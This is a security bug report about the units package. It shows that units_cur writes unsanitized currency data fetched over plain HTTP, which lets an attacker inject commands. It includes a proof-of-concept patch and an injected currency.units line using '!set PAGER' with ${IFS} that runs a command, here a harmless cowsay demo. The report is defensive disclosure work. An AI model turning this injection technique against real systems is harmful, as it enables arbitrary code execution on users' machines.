Package: units
Version: 2.17-1
Tags: security
units_cur does no sanitization of the data it downloads. Malicious
operators of the servers or man-in-the-middle attackers[*] could exploit
this to execute arbitrary code.
As a proof of concept, I patched units_cur to emulate Yahoo returning
malicious data. After updating the data, /var/lib/units/currency.units
looks like this:
southkoreawon 1|0
!set PAGER cowsay${IFS}pwned;exit;
# US$
And this happens:
$ units
Currency exchange rates from finance.yahoo.com on 2018-07-03
3048 units, 109 prefixes, 109 nonlinear units
You have: help kg
_______
< pwned >
-------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
[*] Conveniently, all the data in downloaded over HTTP, so there's no
authentication.
--
Jakub Wilk
--- unpacked/usr/bin/units_cur 2018-06-26 23:03:38.000000000 +0200
+++ /usr/bin/units_cur 2018-07-03 18:43:02.089540024 +0200
@@ -279,6 +279,7 @@
'/allcurrencies/quote?format=json')
res.raise_for_status()
webdata = res.json()['list']['resources']
+ webdata[0]['resource']['fields']['price'] = '0\n!set PAGER cowsay${IFS}pwned;exit;\n#'
except requests.exceptions.RequestException as e:
stderr.write('Error connecting to currency server:\n{}.\n'.
format(e))
